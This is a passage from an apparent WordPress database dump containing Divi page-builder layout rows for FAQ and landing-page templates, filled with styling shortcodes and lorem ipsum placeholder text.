src=\"https://companyregistration.online/wp-content/uploads/2016/07/051.png\" alt=\"051\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18670\"></a> <a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/041-1.png\" alt=\"041\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18671\"></a></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','FAQ #3','','publish','closed','closed','','faq-3','','','2016-06-29 02:24:17','2016-06-29 02:24:17','',0,'https://companyregistration.online/et_pb_layout/faq-3/',0,'et_pb_layout','',0),(25349,1,'2016-06-29 02:25:23','2016-06-29 02:25:23','[et_pb_section admin_label=\"section\" transparent_background=\"off\" background_color=\"#ffffff\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"144px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_width_px=\"940px\" custom_padding_tablet=\"60px||0px|\" custom_padding_last_edited=\"on|desktop\" disabled=\"off\" disabled_on=\"on|on|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_text_color=\"#888888\" text_line_height=\"1.6em\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" max_width=\"820px\" custom_css_main_element=\"font-weight: 600;\" text_font_size_last_edited=\"on|phone\"]\n\n<p>F.A.Q.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"13px||150px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"60px||70px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"5em\" text_text_color=\"#222222\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_tablet=\"40px\" text_font_size_last_edited=\"on|tablet\" max_width=\"950px\"]\n\n<p>Here are some common questions about Elegant.</p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"Section\" fullwidth=\"off\" specialty=\"off\" transparent_background=\"off\" background_color=\"#f7f7f7\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" custom_padding=\"0px||0px|\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"How is my price determined?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#ffffff\" body_text_color=\"#aaaaaa\" use_border_color=\"on\" border_color=\"#000000\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#000000\" open_toggle_text_color=\"#ffffff\" closed_toggle_background_color=\"#000000\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#000000\" custom_padding=\"70px|50px|70px|50px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\" title_line_height=\"1.1em\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"When will Elgant be in more stores?\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#888888\" use_border_color=\"on\" border_color=\"#ffffff\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#ffffff\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"#000000\" icon_color=\"#ffffff\" custom_padding=\"70px|50px|70px|50px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"Warranty\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#ffffff\" body_text_color=\"#aaaaaa\" use_border_color=\"on\" border_color=\"#000000\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#000000\" open_toggle_text_color=\"#ffffff\" closed_toggle_background_color=\"#000000\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#000000\" custom_padding=\"70px|50px|70px|50px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"Return policy and procedures \" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#888888\" use_border_color=\"on\" border_color=\"#ffffff\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#ffffff\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"#000000\" icon_color=\"#ffffff\" custom_padding=\"70px|50px|70px|50px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"How to return merchandise\" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#ffffff\" body_text_color=\"#aaaaaa\" use_border_color=\"on\" border_color=\"#000000\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#000000\" open_toggle_text_color=\"#ffffff\" closed_toggle_background_color=\"#000000\" closed_toggle_text_color=\"#ffffff\" icon_color=\"#000000\" custom_padding=\"70px||70px|\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"on\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" gutter_width=\"1\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_toggle admin_label=\"Toggle\" title=\"Return policy and procedures \" open=\"off\" title_font=\"Open Sans|on|||\" title_font_size=\"24\" title_text_color=\"#000000\" body_text_color=\"#888888\" use_border_color=\"on\" border_color=\"#ffffff\" border_style=\"solid\" body_font=\"Open Sans||||\" body_font_size=\"18\" body_line_height=\"1.6em\" open_toggle_background_color=\"#ffffff\" open_toggle_text_color=\"#000000\" closed_toggle_background_color=\"#ffffff\" closed_toggle_text_color=\"#000000\" icon_color=\"#ffffff\" custom_padding=\"70px|50px|70px|50px\" custom_css_toggle_icon=\"font-size:20px;||\" title_font_size_last_edited=\"on|tablet\" custom_css_toggle_title=\"text-align:center;\" custom_css_toggle_content=\"padding-top:30px;\"]\n\n<p>Maecenas eu placerat ante. Fusce ut neque justo, et aliquet enim. In hac habitasse platea dictumst. Nullam commodo neque erat, vitae facilisis erat. Cras at mauris ut tortor vestibulum fringilla vel sed metus. Donec interdum purus a justo feugiat rutrum. Sed ac neque ut neque dictum accumsan. Cras lacinia rutrum risus, id viverra metus dictum sit amet.</p><p>Fusce venenatis, urna eget cursus placerat, dui nisl fringilla purus, nec tincidunt sapien justo ut nisl. Curabitur lobortis semper neque et varius. Etiam eget lectus risus, a varius orci. Nam placerat mauris at dolor imperdiet at aliquet lectus ultricies.</p><p>Duis tincidunt mi at quam condimentum lobortis.</p>\n\n[/et_pb_toggle][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"section\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/07/2-1.jpg\" transparent_background=\"off\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"on\" parallax_method=\"on\" custom_padding=\"0px||0px|\" padding_mobile=\"on\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" background_color=\"#ffffff\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"190px||190px|\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\" custom_padding_tablet=\"120px||120px|\"][et_pb_column type=\"4_4\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans|on|||\" text_font_size=\"36\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.2em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"||0px|\" custom_padding=\"0px||0px|\"]\n\n<p>Still need help? Send us a note!</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#cccccc\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|tablet\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\" text_font_size_tablet=\"24\"]\n\n<p>For any other questions, please write us at info@elegant.studio or call us on +39 123 456 789</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Open Sans||||\" text_font_size=\"28\" text_text_color=\"#dac8c1\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" text_line_height=\"1.4em\" text_font_size_last_edited=\"on|desktop\" custom_margin=\"34px||0px|\" custom_padding=\"0px||0px|\" max_width=\"680px\"]\n\n<p><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/022-1.png\" alt=\"022\" width=\"9\" height=\"18\" class=\"alignnone size-full wp-image-18669\"></a><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/032-3.png\" alt=\"032\" width=\"23\" height=\"18\" class=\"alignnone size-full wp-image-18668\"></a><a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/051.png\" alt=\"051\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18670\"></a> <a href=\"#\"><img style=\"margin-right: 40px\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/041-1.png\" alt=\"041\" width=\"19\" height=\"18\" class=\"alignnone size-full wp-image-18671\"></a></p>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','FAQ #2','','publish','closed','closed','','faq-2-3','','','2016-06-29 02:25:23','2016-06-29 02:25:23','',0,'https://companyregistration.online/et_pb_layout/faq-2-3/',0,'et_pb_layout','',0),(26701,1,'2016-08-01 18:25:40','2016-08-01 16:25:40','[et_pb_section admin_label=\"#1 Hero Section\" transparent_background=\"off\" background_color=\"#ede7f6\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\" collapsed=\"off\" background_image=\"https://companyregistration.online/wp-content/uploads/2016/08/01.jpg\"][et_pb_row admin_label=\"row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"||0px|\" padding_mobile=\"on\" custom_margin=\"8%||10%|\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"24\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"||0px|\" custom_css_main_element=\"font-weight:300;\"]\n\n<p>Wireframe Kit Vol. 01</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"64\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"98%\" text_font_size_last_edited=\"on|desktop\" text_font_size_phone=\"36\"]\n\n<p>Create a beautiful landing page.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto||||on\" text_font_size=\"16\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"48px|||\" text_line_height=\"1.1em\" text_letter_spacing=\"1px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12\"]\n\n<p><img style=\"float: left;margin-right: 36px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/03.png\" alt=\"03\" width=\"178\" height=\"60\" class=\"alignnone size-full wp-image-26633\" /></p>\n<p style=\"margin-top: 2%\">WATCH A DEMO</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Image\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/021.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"left\" sticky=\"off\" align=\"left\" disabled=\"off\" disabled_on=\"||on\" max_width=\"90%\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"10%|||\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#1.1 Hero Section\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding=\"0px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\"][et_pb_column type=\"1_2\"][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_image admin_label=\"Mockup Overlap\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/02.png\" show_in_lightbox=\"off\" url_new_window=\"off\" use_overlay=\"off\" animation=\"bottom\" sticky=\"on\" align=\"right\" force_fullwidth=\"off\" always_center_on_mobile=\"on\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"-131%|||\" disabled=\"off\" disabled_on=\"on|on|\" max_width=\"80%\" custom_margin_last_edited=\"on|desktop\" custom_margin_tablet=\"-66%|||\"]\n\n\n\n[/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section admin_label=\"#14 Features\" fullwidth=\"off\" specialty=\"off\" collapsed=\"off\" transparent_background=\"off\" background_color=\"#563a82\" allow_player_pause=\"off\" inner_shadow=\"off\" parallax=\"off\" parallax_method=\"off\" padding_mobile=\"off\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" make_equal=\"off\" use_custom_gutter=\"off\"][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" custom_padding=\"0px|||\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding_last_edited=\"on|tablet\"][et_pb_column type=\"1_2\"][et_pb_divider admin_label=\"Divider Desktop\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||margin-top:-17%;||\" height=\"19\" disabled=\"off\" disabled_on=\"on|on|\"]\n\n\n\n[/et_pb_divider][et_pb_divider admin_label=\"Divider Mobile\" color=\"#8975a7\" show_divider=\"on\" divider_style=\"solid\" divider_position=\"top\" divider_weight=\"2\" hide_on_mobile=\"off\" custom_css_main_element=\"width:50px;||\" height=\"19\" disabled=\"off\" disabled_on=\"||on\"]\n\n\n\n[/et_pb_divider][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"52\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"24px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.1em\" max_width=\"80%\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"30\" text_font_size_tablet=\"46\"]\n\n<p>A new era of websites is here.</p>\n\n[/et_pb_text][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"20\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" max_width=\"98%\" text_line_height=\"1.5em\"]\n\n<p>Build beautiful Divi websites thanks to a modular content blocks that makes customization easy and enjoyable. Get your copy today.</p>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"4\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"4.5%||0px|\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\n\n<p><img class=\" size-full wp-image-25874\" style=\"float: left;margin-top: 10px;margin-right: 33px;margin-bottom: 20px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\"></p>\n<div>\n<p style=\"padding-bottom: 0px\">Save time and money</p>\n<p style=\"margin-top: 16px;font-size: 18px\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\n</div>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\n\n<p><img class=\" size-full wp-image-25874\" style=\"float: left;margin-top: 10px;margin-right: 33px;margin-bottom: 20px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\"></p>\n<div>\n<p style=\"padding-bottom: 0px\">Beautiful layouts</p>\n<p style=\"margin-top: 16px;font-size: 18px\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\n</div>\n\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Row\" make_fullwidth=\"off\" use_custom_width=\"off\" width_unit=\"on\" use_custom_gutter=\"off\" gutter_width=\"4\" padding_mobile=\"on\" allow_player_pause=\"off\" parallax=\"off\" parallax_method=\"off\" make_equal=\"off\" parallax_1=\"off\" parallax_method_1=\"off\" parallax_2=\"off\" parallax_method_2=\"off\" column_padding_mobile=\"on\" custom_padding=\"5%||9%|\" custom_padding_phone=\"1%||9%|\" custom_padding_last_edited=\"on|desktop\"][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\n\n<p><img class=\" size-full wp-image-25874\" style=\"float: left;margin-top: 10px;margin-right: 33px;margin-bottom: 20px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\"></p>\n<div>\n<p style=\"padding-bottom: 0px\">Huge components library</p>\n<p style=\"margin-top: 16px;font-size: 18px\">Integer elementum massa at nulla placera. Suspendisse in libero risus, in massa.</p>\n</div>\n\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\"][et_pb_text admin_label=\"Text\" background_layout=\"light\" text_orientation=\"left\" text_font=\"Roboto Light||||\" text_font_size=\"32\" text_text_color=\"#ffffff\" use_border_color=\"off\" border_color=\"#ffffff\" border_style=\"solid\" custom_margin=\"18px||0px|\" custom_css_main_element=\"font-weight:300;\" text_line_height=\"1.3em\" text_font_size_last_edited=\"on|phone\" text_font_size_tablet=\"24\"]\n\n<p><img class=\" size-full wp-image-25874\" style=\"float: left;margin-top: 10px;margin-right: 33px;margin-bottom: 20px\" src=\"https://companyregistration.online/wp-content/uploads/2016/08/05-1.png\" alt=\"03\" width=\"70\" height=\"70\"></p>\n<div>\n<p style=\"padding-bottom: 0px\">For freelancers and agencies</p>\n<p style=\"margin-top: 16px;font-size: 18px\">Integer elementum massa at nulla placera. 